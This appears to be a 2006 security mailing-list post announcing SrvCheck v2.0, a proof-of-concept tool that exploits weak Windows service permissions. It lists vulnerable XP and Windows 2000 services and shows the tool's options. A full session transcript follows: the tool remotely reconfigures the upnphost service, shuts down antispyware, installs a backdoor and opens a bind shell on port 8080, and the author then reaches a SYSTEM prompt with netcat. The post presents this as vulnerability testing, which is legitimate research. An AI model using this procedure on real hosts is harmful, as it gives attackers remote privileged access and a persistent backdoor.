Proof of concept of Sudhakar Govindavajhala and Andrew Appel paper (<a href="http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf">http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf</a>)
Running as an unprivileged user you can test if your services are vulnerable and can be used to install a backdoor.
Both source code and binary included <br>
<b>Microsoft advisory: <a href="http://microsoft.com/technet/security/advisory/914457.mspx">http://microsoft.com/technet/security/advisory/914457.mspx</a></b><br>
<br>
<b>SrvCheck v2.0 is able to perform this checks remotely using for example domain user credentials</b><br>
<b>Here is a short list of Known vulnerable services under XP sp2:</b><br>
<br>
<b>- Advanced User: </b><br>
service: DcomLaunch ( SYSTEM )<br>
Service: UpnpHost ( Local Service )<br>
Service: SSDPSRV (Local Service) <br>
<b>- User: </b><br>
Service: UpnpHost ( Local Service )<br>
Service: SSDPSRV (Local Service) <br>
<b>- Network Config Operators:</b><br>
service: DcomLaunch ( SYSTEM )<br>
Service: UpnpHost ( Local Service )<br>
Service: SSDPSRV (Local Service) <br>
Service: DHCP ( SYSTEM ) <br>
Service: NetBT (SYSTEM - .sys driver) <br>
Service DnsCache (SYSTEM) <br>
<br>
<b>Windows 2000 Professional SP4:</b><br>
<br>
<b>- Power User: </b><br>
service: WMI - Windows Management Instrumentation Driver Extensions ( SYSTEM )<br>
<br>
<b>Third part Software:</b><br>
<br>
HP: "Pml Driver HPZ12"<br>
Audodesk: "Autodesk Licensing Service" - maybe this one: <a href="http://securityfocus.com/bid/16472">http://securityfocus.com/bid/16472</a><br>
<br>
<br>
D:\Programación\srvcheck2>srvcheck2.exe -?<br>
Services Permissions checker v2.0<br>
(c) 2006 Andres Tarasco - <a href="mailto:atarasco@gmail.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">atarasco@gmail.com</a><br>
<br>
Usage:<br>
-l
list vulnerable services<br>
-m <service> modify the configuration for that service<br>
-c <command> Command to execute throw remote service<br>
by default. bindshell application will be used<br>
-H
<Host> specify a remote
host to connect ip/netbiosname)<br>
-u
<user> if not
seletected Default logon credentials used)<br>
-p <password> if not used Default logon credentials used)<br>
-?
Extended information with samples<br>
examples:<br>
srvcheck.exe -l (list local vulnerabilities)<br>
srvcheck.exe -m service (spawn a shell at port 8080)<br>
srvcheck.exe -m service -c "cmd.exe /c md c:\PWNED"<br>
srvcheck -l -H host (list remote vulnerabilities)<br>
<br>
D:\Programación\srvcheck2>srvcheck2.exe -l -H <a href="http://192.168.0.1/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">192.168.0.1</a><br>
Services Permissions checker v2.0<br>
(c) 2006 Andres Tarasco - <a href="mailto:atarasco@gmail.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">atarasco@gmail.com</a><br>
<br>
[+] Trying to connect to remote SCM<br>
[+] Host: \\192.168.0.1\IPC$<br>
[+] Username: (null)<br>
[+] Password: (null)<br>
[+] Network Connection OK<br>
[+] Listing Vulnerable Services...<br>
<br>
[Dhcp] Cliente DHCP<br>
Status: 0x4<br>
Parameter: C:\WINDOWS\System32\svchost.exe -k netsvcs<br>
<br>
[Dnscache] Cliente DNS<br>
Status: 0x4<br>
Parameter:
C:\WINDOWS\System32\svchost.exe -k NetworkService<br>
<br>
[NetBT] NetBios a travÚs de Tcpip<br>
Status: 0x4<br>
Parameter: System32\DRIVERS\netbt.sys<br>
<br>
[SSDPSRV] Servicio de descubrimientos SSDP<br>
Status: 0x1<br>
Parameter:
C:\WINDOWS\System32\svchost.exe -k LocalService<br>
<br>
[upnphost] Host de dispositivo Plug and Play universal<br>
Status: 0x1<br>
Parameter: C:\WINDOWS\System32\svchost.exe <br>
<br>
[+] Analyzed 311 Services in your system<br>
[+] You were Lucky. 5 vulnerable services found<br>
<br>
D:\Programación\srvcheck2>srvcheck2.exe -H <a href="http://192.168.0.1/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">192.168.0.1</a> -m upnphost<br>
Services Permissions checker v2.0<br>
(c) 2006 Andres Tarasco - <a href="mailto:atarasco@gmail.com" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">atarasco@gmail.com</a><br>
<br>
[+] Trying to connect to remote SCM<br>
[+] Host: \\192.168.0.1\IPC$<br>
[+] Username: (null)<br>
[+] Password: (null)<br>
[+] Network Connection OK<br>
[+] Uninstalling previous backdoors<br>
[+] Granting Remote bindshell Execution..<br>
[+] Shutting down remote antispyware Service =)<br>
[+] Installing Backdoor Code...<br>
[+] The service have been succesfully modified =)<br>
[+] Service Opened. Trying to Start... (wait a few seconds)<br>
[+] StarteService() Error due to a non service application execution<br>
[+] Ignore it. Your application should be executed =)<br>
[+] Now connect to port 8080 and enjoy your new privileges<br>
<br>
D:\Programación\srvcheck2>nc localhost 8080<br>
Microsoft Windows XP [Versión 5.1.2600]<br>
(C) Copyright 1985-2001 Microsoft Corp.<br>
<br>
C:\WINDOWS\system32><br>
<br>
<br>
<br>
regards,<br>
<br>
Andres Tarasco<br>
<br>